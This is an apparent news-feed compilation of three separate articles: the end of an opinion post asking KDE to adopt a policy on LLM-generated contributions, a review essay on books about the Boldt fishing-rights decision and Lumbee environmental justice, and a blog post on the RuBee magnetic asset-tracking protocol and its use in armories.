Excuse the invokation of Godwin's Law. Obviously, I don't believe this is a position KDE would hold. I'm just underscoring the need to actually think about whether having X in a project is good, and what ought to be done if we find instead that it's bad.

So, are LLM contributions bad?


LLM Contributions Are Bad

  • As mentioned, LLMs trained on scraped data cannot ever give complete attribution. It's how they work; it's the party trick of a black box. It's also non-consensual use, and it's plagiarism.
    • Occasionally, an LLM will regurgitate/resynthesize author credit. Sometimes these authors are not real, or are unrelated to whatever content is attributed to them. And unless the output is a 1:1 match for their work, it's incomplete credit and still plagiarism.
    • Hypothetically, one could train a language model to only use public domain or consensually granted data, such as code you've written yourself. But, these tend to give poor results.
  • LLMs bring downward pressure on code quality, lost productivity , and maintainer abuse. LLM contributions are often accompanied by an erroneous, nonsensical, or blathering description. The contributor also tends to have little-to-no understanding of the contribution and cannot personally answer questions from the review process. This is a waste of maintainer time and labour , is disrespectful, and can lead to burnout.
  • Scrapers are a scourge on the open web. So many FLOSS projects have been struggling with DDOS attacks, draining labor and money. Information sources are being diluted in a flood of spam. It's an extractive and corrosive force capitalizing on the digital commons.
  • There's the environmental impact. The KDE Eco project is probably displeased by the power usage of "AI" datacenters, and by the increased reliance on coal and natural gas plants to provide that power.
    • Hypothetically, a small local model could use less power than, say, playing a video game. But, these tend to give poor results.
  • And, importantly, LLMs are abetting fascism. These are scary times, and I like KDE because of its potential for being a reprieve from the power that tech wields over people. In constrast, "AI" normalization empowers what is increasingly clearly a tech oligarchy. "AI"'s greatest strength for fascism is the excuse; it's an excuse for thievary, bailouts, surveillance, discrimination, erosion of labor rights, and waving away responsibility. And that's to say nothing of its role in the disinformation machine.

I understand KDE has had some prior run-ins with "AI", such as Kdenlive's optional Whisper integration and a few in-progress chatbot clients. I'm not terribly fond of these, but right now I'd just like to see a plan for an "AI" contributions policy.

I'm not a decorated developer nor an expert on how not to feed into fascism, so please reach out to others to discuss. Reach out to the folks at Servo or Krita, or Bevy and Asahi Linux. Reach out to David Revoy. To Ed Zitron. To Andrew Roach. Anyone. See what people have already said , recap the ground we've already tread. Heck, I'm sure Brodie Robertson could talk about similar projects who've had to wrestle with an "AI" Policy.

Anyway, thanks for taking the time to read. This is important to me, and you'll find it's important to many. Take care and best wishes!

The Third Sovereign

Portside
portside.org
2025-11-24 03:55:54
The Third Sovereign Ira Sun, 11/23/2025 - 22:55 ...
Original Article

Reviewed:

Treaty Justice: The Northwest Tribes, the Boldt Decision, and the Recognition of Fishing Rights

by Charles Wilkinson

University of Washington Press, 353 pp., $34.95

On the Swamp: Fighting for Indigenous Environmental Justice

by Ryan E. Emanuel

University of North Carolina Press, 291 pp., $99.00; $22.95 (paper)

Billy Frank Jr. was fourteen when, in December 1945, he was fishing for salmon in the Nisqually River near Olympia, Washington, and state game wardens arrested him for the first time. Over the next twenty-five years he was arrested (and often jailed) more than four dozen times, despite his airtight defense: he fished under the terms of the Medicine Creek Treaty of 1854, one of ten treaties negotiated by Governor Isaac Stevens in which the US promised tribes in the Puget Sound area of the Pacific Northwest the right to fish where they’d always fished “in common with all citizens of the Territory.”

In 1965 the intensity of the arrests changed. Frank was fishing the Nisqually with his brother-in-law when armed wardens in a high-speed motorboat rammed Frank’s cedar canoe. “They got all kinds of training and riot gear—shields, helmets, everything,” Frank told Charles Wilkinson back in the 1970s, when Wilkinson was a young attorney with the Native American Rights Fund. “These guys had a budget. This was a war.”

In the mid-1960s Frank was one of several young activists in the Pacific Northwest who had begun staging “fish-ins,” acts of protest inspired by Black civil rights sit-ins but, a participant wrote, “done in a distinctive Indian way.” Native activists, with their families and allies, fished at riverside encampments, pressing their own fishing rights against state fishing prohibitions, resulting in arrests and news coverage and increasing brutality on the part of the state. The violence peaked in the summer of 1970, when state and local police raided an encampment on the Puyallup River in Tacoma, using rifles, tear gas, and batons to arrest dozens of men, women, and children.

One of the bystanders gassed during the melee was Stan Pitkin, the US attorney for western Washington who, days later, filed a complaint, United States v. Washington , on behalf of tribes that had signed the so-called Stevens treaties. The four-year trial resulted in a resounding victory for tribal sovereignty in the United States, reasserting the tribes’ fishing rights under the treaties and affirming those treaties as living documents—a verdict known today as the Boldt decision, named for its author, Judge George Boldt.

Frank served as the chairman of the Northwest Indian Fisheries Commission, the organization established by the 1974 ruling to aid the tribes in managing fisheries—a post he held for more than thirty years. In 2013 he asked Wilkinson, his old friend, by then an expert in federal Indian law, to write a book about the case. Wilkinson died in 2023, but the book he completed, Treaty Justice , deftly lays out one of the twentieth century’s most significant and underestimated legal decisions. “Judge George Boldt’s ruling…is a landmark in the American civil rights movement,” Wilkinson writes. “It belongs in the same company as Brown v. Board of Education and a select few other court cases in terms of bringing justice to dispossessed peoples.”

The trial began with a question: What were the circumstances under which these Pacific Northwest tribal nations signed the treaties negotiated by Isaac Stevens? A Massachusetts-born army engineer, Mexican-American War veteran, and railroad surveyor, Stevens was appointed governor of the newly established Washington Territory by his fellow veteran President Franklin Pierce in 1853. US expansion had slowed while Congress debated slavery’s future in the new territories, though Pierce still coveted Alaska, Hawaii, and Cuba and was eager to quickly solidify possession of what would become Washington, Idaho, and part of Montana. In the Northwest, the Donation Land Act of 1850 and its companion legislation, the Oregon Indian Treaty Act, called for the territorial commissioners to extinguish Native claims—declaring them null and void for the sake of white settlement—a task Stevens took on with alacrity.

The tribal cultures and economies Stevens encountered in the Puget Sound area were as varied as the region’s ecology. Around what are today called the San Juan Islands, the Lummi set reef nets in kelp beds to catch salmon in the northern sound’s open waters. To the south, the Nisqually fished the rivers and managed the prairies, burning forest to encourage grazing habitat for deer and elk. On the Olympic Peninsula, the Quinault caught salmon in their glacial rivers while harvesting shellfish along the Pacific coast, and on the peninsula’s northwestern tip, the Makah, whose warriors had repelled British sailors a century earlier, also caught salmon in their tidal rivers but focused on halibut and famously whales.

From 1820 to 1840, Wilkinson explains in Treaty Justice , the tribes had managed to coexist peacefully with British traders. But as the late Nisqually historian Cecelia Svinth Carpenter noted in Stolen Lands: The Story of the Dispossessed Nisquallies (2007), “The peacefulness of the scene fast disappeared when American families started arriving and building fences around choice Nisqually land.”

Stevens’s initial plan was to move all the tribes to a single reservation, an idea they quickly rejected. George Gibbs, a Harvard-educated ethnographer, suggested that tribal leaders would consider multiple reservations if guaranteed

the right of taking fish, at all usual and accustomed grounds and stations…, and of erecting temporary houses for the purpose of curing, together with the privilege of hunting, gathering roots and berries, and pasturing their horses on open and unclaimed lands.

The “final settlement,” as Stevens called it, was conducted in Chinook Jargon, a Pacific coast trade language of an estimated five hundred words, the effective use of which, a scholar noted, “depends on the ingenuity and imagination of the speaker.” Translating was Frank Shaw, a settler who, Wilkinson writes, “had only a moderate grasp of the Chinook Jargon and knew no Indigenous languages.”

Treaties were viewed by the US as a “temporary expedient,” in the words of the historian Alexandra Harmon, and in 1887 the General Allotment Act designated vast amounts of tribal land “surplus” based on the assumption that increasingly Americanized tribes would give up hunting and fishing communal lands for cultivating small private farms. Henry Dawes, the Massachusetts senator who wrote the act, saw collective ownership as Native America’s fatal flaw: “There is no selfishness, which is at the bottom of civilization.” Over the next half-century an estimated 90 million acres of Native land were taken by the US.

The effect of the Stevens treaties, for tribes in the Puget Sound area as elsewhere, was what Wilkinson calls “the long suppression.” “Native fishing rights, so central to tribal existence,” he explains, “were denied or scraped to the bone.” For decades private canneries and even dams decimated salmon runs, while US Indian agents forbade indigenous practices and sent Native children off to English-only Christian schools.

Then in 1953 the US adopted a new policy of “termination,” moving to end federal responsibilities to the tribes entirely, regardless of treaties. Within twenty years Congress terminated the recognition of 109 tribes in Oregon, California, Wisconsin, and elsewhere, affecting more than 11,000 Native people and taking upward of 1.3 million acres of land. No tribes were terminated in Washington state,

but as salmon dwindled, commercial and sports fishermen focused state enforcement on tribal fishers—despite the fact that when Billy Frank’s canoe was rammed on the Nisqually by wardens in a speedboat, the tribes were taking only 6 percent of the total Puget Sound harvest.

In the 1950s and 1960s a confluence of events revitalized Indian country. Native American veterans returned from World War II and the Korean War and attended college; tribes took control of programs formerly administered by the Department of the Interior’s Bureau of Indian Affairs, in schools, hospitals, and resource management.

In the Puget Sound area, leaders of the Muckleshoot, Puyallup, and Nisqually Nations began to meet with attorneys about their fishing rights. In 1963 Makah leaders interviewed Al Ziontz, a Seattle lawyer, who said, “If I were representing the Makah Tribe, the principle of tribal sovereignty would be the way I would go about defending your rights.” Ziontz knew little about Indian law—no law school taught it, despite tribes being, after the federal and state governments, the third of the three sovereign powers in the US constitutional system. Sovereignty made the tribes, as Chief Justice John Marshall wrote in 1832, “distinct political communities, having territorial boundaries, within which their authority is exclusive.”

What happened next was a powerful mix of scholarship and organizing, with lawyers and activists tag-teaming to move the tribes toward a confrontation with the state. Hank Adams, an Assiniboine and Sioux activist who grew up on the Quinault Reservation—Wilkinson calls him “razor-sharp brilliant and driven”—set up at Frank’s Landing, a riverside encampment named for Billy Frank’s father, where, with Janet McCloud (Tulalip) and Ramona Bennett (Puyallup), he organized the Survival of the American Indian Association. Starting in 1964 the group turned fishing arrests into civil rights actions.

In the group’s first years celebrities (including Marlon Brando and Dick Gregory) were arrested at protests, as Adams organized support from Friends groups, Black Panthers, and the Southern Christian Leadership Conference. A planned five-day action at Frank’s Landing in 1968 lasted for months; in addition to eating the salmon they caught, the activists sold some to fund the encampment. By the time the police raided the Puyallup fish-in, in 1970, the young radicals were supported by the Puyallup tribal council, which sent a police force to protect the activists, who were fired on at random by vigilantes. On the day of the raid, Ramona Bennett said to game wardens approaching in a boat, “Touch our net and we’ll shoot you!”

In suing the State of Washington, Stan Pitkin, the Nixon-appointed US attorney, was working for what he called “a case to end all cases.” The time seemed right; two months before, Nixon had issued his special message to Congress on Indian affairs, which called for tribal “self-determination” and declared the termination policy “morally and legally unacceptable.” (Nixon, who advocated for land returns to tribes, counted his football coach at Whittier College, Wallace Newman, a Luiseño tribal citizen, as a mentor, but the president was likely also responding to Red Power actions, like the occupation of Alcatraz in 1969.) Judge Boldt was a bow-tie-wearing conservative who, just before the trial, had jailed Vietnam War protesters, making the tribes’ legal team nervous. But as the weeks passed, tribal attorneys sensed Boldt’s attentiveness and were relieved to spot Vine Deloria Jr.’s 1969 best seller, Custer Died for Your Sins: An Indian Manifesto , in his chambers.

For the first year of the trial, Judge Boldt took testimony on the treaties’ historical background. The State of Washington’s attorneys claimed that in 1854 the tribes were in “rapid cultural decline,” and they argued that the fishing rights defined by the Stevens treaties were moot. The plaintiffs’ expert—Barbara Lane, a Canadian anthropologist who had previously worked with numerous Northwest tribes—described a vibrant, adaptive culture, past and present. “They were not declining into nothing,” she said. Lane showed how the tribes had not only adapted to the new settlers but offered them ways to survive, with new kinds of food, shelter, and clothing. North of the Strait of Juan de Fuca, the British settlers in Victoria burned whale oil purchased from the Makah.

Next, twenty-nine tribal members testified to show that ancient cultural practices were also contemporary. Witnesses spoke in their own languages and recounted decades of abuse by Indian agents while displaying a generational fortitude that, trial participants noticed, captivated Boldt. There was also humor, another survival trait. Asked whether off-reservation fishing of winter chum salmon was prohibited by the state, Billy Frank said, “Well, I have been in jail enough times to say it probably is.”

As the trial progressed, a new facet of the case emerged: “the ambition,” Wilkinson writes, “of tribes to regulate their own members and to engage in salmon management.” Boldt’s ruling could add tribal oversight to federal and state oversight, and he now worked to decide whether the tribes could manage their own fisheries. The great revelation for nontribal citizens was that the tribes not only could but often already did so better than the region’s newcomers. In addition to a young Quinault fisheries expert finishing up his Ph.D., Boldt heard from Horton Capoeman, sixty-eight, who was bilingual and had lived on the Quinault Nation’s reservation his entire life, save for his US Army service. He had served on the tribal council, on the business committee, and as a tribal judge; his testimony detailed how the tribe had for generations managed Native and non-Native fishers when they either poached or overfished, by regulating timing or restricting access, depending on the offense. As Capoeman’s grandfather had told him, “It had to be done in order to bring them back to their senses.”

Boldt’s meticulousness, combined with a temporary assignment in Washington, D.C., meant that the trial stretched on, but at last on February 12, 1974—Lincoln’s birthday, a date Boldt chose to reflect what he saw as the decision’s significance—he upheld the tribes’ treaty rights and reinforced their status as sovereign entities. In straightforward, unsentimental language, he described the tribes’ “paramount dependence upon the products of an aquatic economy, especially anadromous fish, to sustain the Indian way of life.”

The decision was celebrated throughout Indian country. “In the 1960s there was a general belief in the public that treaties were ancient history, not the supreme law of the land,” said John Echohawk, the executive director of the Native American Rights Fund. “Our wish became true…. The treaties were acknowledged as the law. The Boldt Decision was the first big win for the modern tribal sovereignty movement.” A state official, meanwhile, compared the decision to a dictatorship. Bumper stickers read “Can Judge Boldt—not salmon.” Boldt, white Washingtonians argued, had made the majority population “second-class citizens,” denied equal rights.

A federal appeals court upheld the decision in 1975, but the Supreme Court declined to hear it for five years, a silence that exacerbated state officials’ anger and resulted in a salmon fishing free-for-all. Puget Sound was filled with white poachers ramming Indian boats, cutting nets, and slashing car tires (as they still do). At last the Supreme Court upheld the decision on July 2, 1979, quoting Boldt’s opinion repeatedly, as well as a 1905 case, United States v. Winans , which described the right to take salmon as “not much less necessary to the existence of the Indians than the atmosphere they breathed.” Washington state legislators were reprimanded. “Except for some desegregation cases,” the decision read, “the district court has faced the most concerted official and private efforts to frustrate a decree of a federal court witnessed in this century.”

In the years of the Pacific Northwest fish-ins, Sam Ervin, the North Carolina congressman who led the Watergate hearings, had a reputation for fighting against civil rights legislation, though he nevertheless sponsored the Indian Civil Rights Act of 1968. Unbeknownst to many Americans, North Carolina is home to the largest population of Native Americans east of the Mississippi—a population that included Ervin’s staffer Helen Maynor Scheirbeck, a Lumbee from Robeson County. Scheirbeck also helped pass the 1972 Indian Education Act. Thanks to that law, in the late 1970s a Lumbee educator was brought into the North Carolina elementary school attended by Ryan E. Emanuel, whose book, On the Swamp: Fighting for Indigenous Environmental Justice , looks at the survival of indigenous communities along the southern coastal plain.

Emanuel is a hydrologist and a professor at Duke. He grew up in Charlotte, a city in the soft hills of North Carolina’s Piedmont region, spending summers “on the swamp”—the traditional Lumbee territory. “The place we come from is the crazy quilt of blackwater streams, floodplain forests, and sandy uplands that all drain to the Lumbee River,” Emanuel writes.

To be “on the swamp” means to be around Prospect, Saddletree, Burnt Swamp, Sandy Plains, Back Swamp, or one of the myriad other Lumbee communities arrayed across the Lumbee River basin.

The area is characterized by low-lying, hemlock-covered microclimates that are remnants of the just-glaciated past, what paleoecologists refer to as refugia.

By the time Isaac Stevens set out to extinguish Native rights in the Pacific Northwest, tribes in the Southeast (including the Cherokee, Chickasaw, and Choctaw) either had already been forcibly removed to what would become Oklahoma or were negotiating recognition in a society that acknowledged them reluctantly, if at all. Early encounters with settlers in the Southeast had destroyed communities with war and disease, but the Lumbee found a form of protection in the isolated swamps, their own refugia. “To settlers,” Emanuel writes, “they were unmapped places, interstitial lands. But to us, these places were home—backwaters amid swirling currents of colonialism.”

In On the Swamp , Emanuel uses his scientific training to gauge his homeland’s inscrutability to white settlers. In 2019 he compared nearly a hundred maps of the coastal plain created between the 1500s and the early 1900s and discovered that, prior to 1800, colonial mapmakers “generally did a poor job of representing the topology of the Lumbee River.” To miss the river’s “twisting, wandering channel” was to miss the “network of connected places” that makes up the Lumbee community—but it was this obscurity that afforded the Lumbee protection and, with an abundance of food and a strategic distance, strength. It was from a base in a Lumbee swamp that Henry Berry Lowry, a biracial freedom fighter and Lumbee hero, raided the Confederates during and after the Civil War, managing to avoid a sheriff’s hundred-man posse in 1871.

In the twentieth century, attacks came from railroad corporations, logging companies, and developers involved in wetland drainage projects that saw the luxuriously rich ecology of the swamps as merely, a local judge said in 1939, “noisome odors and unwholesome fogs.” Then in the 1950s natural gas came to Robeson County, and the land was suddenly valuable in another way—as an easement. “When Indigenous people today say that fossil fuel projects plow through their lands without regard for the well-being of communities and cultural landscapes, they are not exaggerating,” Emanuel writes. “They are speaking from generations of lived experience.”

Prospect, a town in Robeson County made up almost entirely of Native people, became a gas hub along the Transcontinental Pipeline, or TRANSCO, then the world’s longest gas pipeline, running from Texas to New York. Another hub was established near the historic site of Fort Nooheroka, where in 1713 a white militia had burned to death hundreds of Tuscarora people and enslaved hundreds more. (Many of the remaining Tuscarora soon relocated, joining the Haudenosaunee Confederacy in New York state.) These areas now include streams overwhelmed with animal waste from swine and poultry farms, and, Emanuel notes, “an ever-expanding tangle of gas pipelines and related infrastructure.”

But the Federal Energy Regulatory Commission (FERC) never asked the Lumbee for permission to run pipelines through their land. In 1956, two years before the digging began, Congress passed the Lumbee Act, which recognized the tribe as a sovereign entity. But termination was US Indian policy at the time, and a last-minute clause was added at the Bureau of Indian Affairs’ request, rendering the Lumbee legally invisible:

Nothing in this Act shall make such Indians eligible for any services performed by the United States for Indians because of their status as Indians, and none of the statutes of the United States which affect Indians because of their status as Indians shall be applicable to the Lumbee Indians.

This has caused real-life complications. In 2014, when a consortium of energy companies proposed a six-hundred-mile-long pipeline that would run from West Virginia to Robeson County, the chairman of the Lumbee Nation requested consultation, citing the Lumbee Act. The federal regulators sidestepped the tribe, citing the Lumbee Act, and in 2016 FERC concluded that “environmental justice populations would not be disproportionately affected” by the pipeline.

In 2017 Emanuel published a report in Science analyzing the route of the pipeline and showing how developers planned to clear-cut the swamp forests where the pipeline crossed water. Digging into the datasets buried in FERC’s appendixes, he also showed that while the Lumbee and other Native Americans made up just 1 percent of the population in the regions of West Virginia, Virginia, and North Carolina that the line would run through, they made up 5 percent of the people directly affected by its route. The pipeline was canceled in 2020, but had it been built, one in four Native Americans in North Carolina, or 30,000 people, would have lived along it—a population larger than that threatened by the Dakota Access Pipeline at Standing Rock.

Last March, Trump struck down a Biden executive order intended to strengthen tribal sovereignty. Yet even Biden’s order reads as aspirational; it suggested that the government consult with tribes “to ensure that Federal laws, policies, practices, and programs support Tribal Nations more effectively,” but consultation is not law. Deb Haaland, the Laguna Pueblo congresswoman from New Mexico who under Biden became the first indigenous secretary of the interior, oversaw the long-overdue accounting of the barbaric government-run Indian reservation boarding schools, including the uncovering of almost a thousand often unmarked graves. But in 2023, in that same position, she permitted ConocoPhillips’s $8 billion drilling plan on Alaska’s North Slope, the largest oil drilling project on public lands in US history, over the concerns of the Iñupiat mayor closest to the site, who noted that the previous year, during an uncontrolled ConocoPhillips gas release (“a unique event, with nothing similar ever occurring,” the corporation insisted), employees were evacuated while village residents were told they were safe.

This is not to say that the Trump administration, which aims to defund the federal agencies tribes rely on, won’t be worse than Biden. The government shutdown itself highlights the way the federal government funds its trust and treaty obligations through discretionary as opposed to mandatory funding for tribes, already the least well-funded among us, and the rush to extract everything from oil to rare earth minerals will hit indigenous lands hardest. But then the US government has a long, bipartisan, Constitution-sanctioned history of both taking Native territory and destroying it, denying imprisoned Native children their language in the process. Emanuel cites the United Nations special rapporteur on the rights of indigenous peoples, Victoria Tauli-Corpuz, who, after visiting western tribes in 2017, critiqued the US’s disregard for tribal sovereignty:

Sadly, I found the situation faced by the Standing Rock Sioux Tribe is shared by many other indigenous communities in the United States, as tribal communities nationwide wrestle with the realities of living in ground zero of energy impact.

The Boldt decision looked hard at a complicated history to map a new future for Native rights—and it worked. It is often cited as a first step toward the UN’s adoption in 2007 of the Declaration on the Rights of Indigenous Peoples. (The US was one of four “no” votes and the last holdout until late 2010, when Barack Obama agreed to support it, if only as an aspiration.) The autonomy allowed by Boldt helped the Olympic Peninsula’s Lower Elwha Klallam Tribe, whose elders had signed one of Stevens’s treaties, to, by 2014, take down the salmon-blocking dams that had been built on the Elwha River in 1910 by investors from Winnipeg and Chicago to power pulp mills. In 2023 the tribe held its first ceremonial salmon catch in decades. In California and Oregon, where the Yurok Tribe used its Boldt-era legal victories to regain its land and eventually take down dams on the Klamath River, salmon took only about a week to find their way to tributaries that had not had salmon in them for over half a century. “It feels like catharsis. It feels like we are on the right path. It gives me hope for the future,” Barry McCovey Jr., the director of the Yurok Tribe’s fisheries department, told the Associated Press .

Hope is a rare commodity, but if there is hope for the earth, generally it has to do with acknowledging indigenous sovereignty in the face of insatiable resource extraction. Indigenous people make up 6 percent of the world’s population, but their territory accounts for close to a quarter of the earth’s land surface, containing more than a third of remaining natural lands worldwide, often in northern boreal and equatorial forests. Tribes have built up a body of Indian law that is as dynamic as it is unacknowledged. “Tribal sovereignty is one of the most powerful and valuable public ideas that has ever touched my mind,” Wilkinson writes.

I say that, not just because of tribal sovereignty’s legal and intellectual worth, but because it also has proved to be so invincible. The world’s most powerful nation tried to terminate tribal sovereignty over the course of many generations, but could not because it meant so much to Indian people, small minority that they were, and they refused to give in.


Robert Sullivan ’s books include Rats , The Meadowlands , and A Whale Hunt . His latest, Double Exposure: Resurveying the West with Timothy O’Sullivan, America’s Most Mysterious War Photographer , was published last year. (December 2025)

The New York Review was launched during the New York City newspaper strike of 1963, when the magazine’s founding editors, Robert Silvers and Barbara Epstein, alongside Jason Epstein, Robert Lowell, and Elizabeth Hardwick, decided to start a new kind of publication—one in which the most interesting, lively, and qualified minds of the time could write about current books and issues in depth.

Readers responded by buying almost every copy and writing thousands of letters to demand that the Review continue. From the beginning, the editors were determined that the Review should be an independent publication; it began life as an editorial voice beholden to no one, and it remains so today.

Silvers and Epstein continued as co-editors until her death in 2006, and Silvers served as sole editor until his death in 2017. Since 2019 Emily Greenhouse has edited The New York Review, and it remains the magazine where, across twenty issues each year, the major voices in world literature and thought discuss books and ideas. In addition to the print magazine, the NYR Online publishes thorough and wide-ranging essays about politics national and global, film, art, and the cultural preoccupations of the day.

RuBee

Hacker News
computer.rip
2025-11-24 03:08:10
Comments...
Original Article

I have at least a few readers for which the sound of a man's voice saying "government cell phone detected" will elicit a palpable reaction. In Department of Energy facilities across the country, incidences of employees accidentally carrying phones into secure areas are reduced through a sort of automated nagging. A device at the door monitors for the presence of a tag; when the tag is detected it plays an audio clip. Because this is the government, the device in question is highly specialized, fantastically expensive, and says "government cell phone" even though most of the phones in question are personal devices. Look, they already did the recording, they're not changing it now!

One of the things that I love is weird little wireless networks. Long ago I wrote about ANT+ , for example, a failed personal area network standard designed mostly around fitness applications. There's tons of these, and they have a lot of similarities---so it's fun to think about the protocols that went down a completely different path. It's even better, of course, if the protocol is obscure outside of an important niche. And a terrible website, too? What more could I ask for.

The DoE's cell-phone nagging boxes, and an array of related but more critical applications, rely on an unusual personal area networking protocol called RuBee.

RuBee is a product of Visible Assets Inc., or VAI, founded in 2004 1 by John K. Stevens. Stevens seems a somewhat improbable founder, with a background in biophysics and eye health, but he's a repeat entrepreneur. He's particularly fond of companies called Visible: he founded Visible Assets after his successful tenure as CEO of Visible Genetics. Visible Genetics was an early innovator in DNA sequencing, and still provides a specialty laboratory service that sequences samples of HIV in order to detect vulnerabilities to antiretroviral medications.

Clinical trials in the early 2000s exposed Visible Genetics to one of the more frustrating parts of health care logistics: refrigeration. Samples being shipped to the lab and reagents shipped out to clinics were both temperature sensitive. Providers had to verify that these materials had stayed adequately cold throughout shipping and handling, otherwise laboratory results could be invalid or incorrect. Stevens became interested in technical solutions to these problems; he wanted some way to verify that samples were at acceptable temperatures both in storage and in transit.

Moreover, Stevens imagined that these sensors would be in continuous communication. There's a lot of overlap between this application and personal area networks (PANs), protocols like Bluetooth that provide low-power communications over short ranges. There is also clear overlap with RFID; you can buy RFID temperature sensors. VAI, though, coined the term visibility network to describe RuBee. That's visibility as in asset visibility: somewhat different from Bluetooth or RFID, RuBee as a protocol is explicitly designed for situations where you need to "keep tabs" on a number of different objects. Despite the overlap with other types of wireless communications, the set of requirements on a visibility network have lead RuBee down a very different technical path.

Visibility networks have to be highly reliable. When you are trying to keep track of an asset, a failure to communicate with it represents a fundamental failure of the system. For visibility networks, the ability to actually convey a payload is secondary: the main function is just reliably detecting that endpoints exist. Visibility networks have this in common with RFID, and indeed, despite its similarities to technologies like BLE RuBee is positioned mostly as a competitor to technologies like UHF RFID.

There are several differences between RuBee and RFID; for example, RuBee uses active (battery-powered) tags and the tags are generally powered by a complete 4-bit microcontroller. That doesn't necessarily sound like an advantage, though. While RuBee tags advertise a battery life of "5-25 years", the need for a battery seems mostly like a liability. The real feature is what active tags enable: RuBee operates in the low frequency (LF) band, typically at 131 kHz.

At that low frequency, the wavelength is very long, about 2.5 km. With such a long wavelength, RuBee communications all happen at much less than one wavelength in range. RF engineers refer to this as near-field operation, and it has some properties that are intriguingly different from more typical far-field RF communications. In the near-field, the magnetic field created by the antenna is more significant than the electrical field. RuBee devices are intentionally designed to emit very little electrical RF signal. Communications within a RuBee network are achieved through magnetic, not electrical fields. That's the core of RuBee's magic.

The idea of magnetic coupling is not unique to RuBee. Speaking of the near-field, there's an obvious comparison to NFC which works much the same way. The main difference, besides the very different logical protocols, is that NFC operates at 13.56 MHz. At this higher frequency, the wavelength is only around 20 meters. The requirement that near-field devices be much closer than a full wavelength leads naturally to NFC's very short range, typically specified as 4 cm.

At LF frequencies, RuBee can achieve magnetic coupling at ranges up to about 30 meters. That's a range comparable to, and often much better than, RFID inventory tracking technologies. Improved range isn't RuBee's only benefit over RFID. The properties of magnetic fields also make it a more robust protocol. RuBee promises significantly less vulnerability to shielding by metal or water than RFID.

There are two key scenarios where this comes up: the first is equipment stored in metal containers or on metal shelves, or equipment that is itself metallic. In that scenario, it's difficult to find a location for an RFID tag that won't suffer from shielding by the container. The case of water might seem less important, but keep in mind that people are made mostly of water. RFID reading is often unreliable for objects carried on a person, which are likely to be shielded from the reader by the water content of the body.

These problems are not just theoretical. WalMart is a major adopter of RFID inventory technology, and in early rollouts struggled with low successful read rates. Metal, moisture (including damp cardboard boxes), antenna orientation, and multipath/interference effects could cause read failure rates as high as 33% when scanning a pallet of goods. Low read rates are mostly addressed by using RFID "portals" with multiple antennas. Eight antennas used as an array greatly increase read rate, but at a cost of over ten thousand dollars per portal system. Even so, WalMart seems to now target a success rate of only 95% during bulk scanning.

95% might sound pretty good, but there are a lot of visibility applications where a failure rate of even a couple percent is unacceptable. These mostly go by the euphemism "high value goods," which depending on your career trajectory you may have encountered in corporate expense and property policies. High-value goods tend to be items that are both attractive to theft and where theft has particularly severe consequences. Classically, firearms and explosives. Throw in classified material for good measure.

I wonder if Stevens was surprised by RuBee's market trajectory. He came out of the healthcare industry and, it seems, originally developed RuBee for cold chain visibility... but, at least in retrospect, it's quite obvious that its most compelling application is in the armory.

Because RuBee tags are small and largely immune to shielding by metals, you can embed them directly in the frames of firearms, or as an aftermarket modification you can mill out some space under the grip. RuBee tags in weapons will read reliably when they are stored in metal cases or on metal shelving, as is often the case. They will even read reliably when a weapon is carried holstered, close to a person's body.

Since RuBee tags incorporate an active microcontroller, there are even more possibilities. Temperature logging is one thing, but firearm-embedded RuBee tags can incorporate an accelerometer (NIST-traceable, VAI likes to emphasize) and actually count the rounds fired.


Sidebar time: there is a long history of political hazard around "smart guns." The term "smart gun" is mostly used more specifically for firearms that identify their user, for example by fingerprint authentication or detection of an RFID fob. The idea has become vague enough, though, that mention of a firearm with any type of RFID technology embedded would probably raise the specter of the smart gun to gun-rights advocates.

Further, devices embedded in firearms that count the number of rounds fired have been proposed for decades, if not a century, as a means of accountability. The holder of a weapon could, in theory, be required to positively account for every round fired. That could eliminate incidents of unreported use of force by police, for example. In practice I think this is less compelling than it sounds, simple counting of rounds leaves too many opportunities to fudge the numbers and conceal real-world use of a weapon as range training, for example.

That said, the NRA has long been vehemently opposed to the incorporation of any sort of technology into weapons that could potentially be used as a means of state control or regulation. The concern isn't completely unfounded; the state of New Jersey did, for a time, have legislation that would have made user-identifying "smart guns" mandatory if they were commercially available. The result of the NRA's strident lobbying is that no such gun has ever become commercially available; "smart guns" have been such a political third rail that any firearms manufacturer that dared to introduce one would probably face a boycott by most gun stores. For better or worse, a result of the NRA's powerful political advocacy in this area is that the concept of embedding security or accountability technology into weapons has never been seriously pursued in the US. Even a tentative step in that direction can produce a huge volume of critical press for everyone involved.

I bring this up because I think it explains some of why VAI seems a bit vague and cagey about the round-counting capabilities of their tags. They position it as purely a maintenance feature, allowing the armorer to keep accurate tabs on the preventative maintenance schedule for each individual weapon (in armory environments, firearm users are often expected to report how many rounds they fired for maintenance tracking reasons). The resistance of RuBee tags to concealment is only positioned as a deterrent to theft, although the idea of RuBee-tagged firearms creates obvious potential for security screening. Probably the most profitable option for VAI would be to promote RuBee-tagged firearms as tool for enforcement of gun control laws, but this is a political impossibility and bringing it up at all could cause significant reputational harm, especially with the government as a key customer. The result is marketing copy that is a bit odd, giving a set of capabilities that imply an application that is never mentioned.


VAI found an incredible niche with their arms-tracking application. Institutional users of firearms, like the military, police, and security forces, are relatively price-insensitive and may have strict accounting requirements. By the mid-'00s, VAI was into the long sales cycle of proposing the technology to the military. That wasn't entirely unsuccessful. RuBee shot-counting weapon inventory tags were selected by the Naval Surface Warfare Center in 2010 for installation on SCAR and M4 rifles. That contract had a five-year term, it's unclear to me if it was renewed. Military contracting opened quite a few doors to VAI, though, and created a commercial opportunity that they eagerly pursued.

Perhaps most importantly, weapons applications required an impressive round of safety and compatibility testing. RuBee tags have the fairly unique distinction of military approval for direct attachment to ordnance, something called "zero separation distance" as the tags do not require a minimum separation from high explosives. Central to that certification are findings of intrinsic safety of the tags (that they do not contain enough energy to trigger explosives) and that the magnetic fields involved cannot convey enough energy to heat anything to dangerous temperatures.

That's not the only special certification that RuBee would acquire. The military has a lot of firearms, but military procurement is infamously slow and mercurial. Improved weapon accountability is, almost notoriously, not a priority for the US military which has often had stolen weapons go undetected until their later use in crime. The Navy's interest in RuBee does not seem to have translated to more widespread military applications.

Then you have police departments, probably the largest institutional owners of firearms and a very lucrative market for technology vendors. But here we run into the political hazard: the firearms lobby is very influential on police departments, as are police unions which generally oppose technical accountability measures. Besides, most police departments are fairly cash-poor and are not likely to make a major investment in a firearms inventory system.

That leaves us with institutional security forces. And there is one category of security force that are particularly well-funded, well-equipped, and beholden to highly R&D-driven, almost pedantic standards of performance: the protection forces of atomic energy facilities.

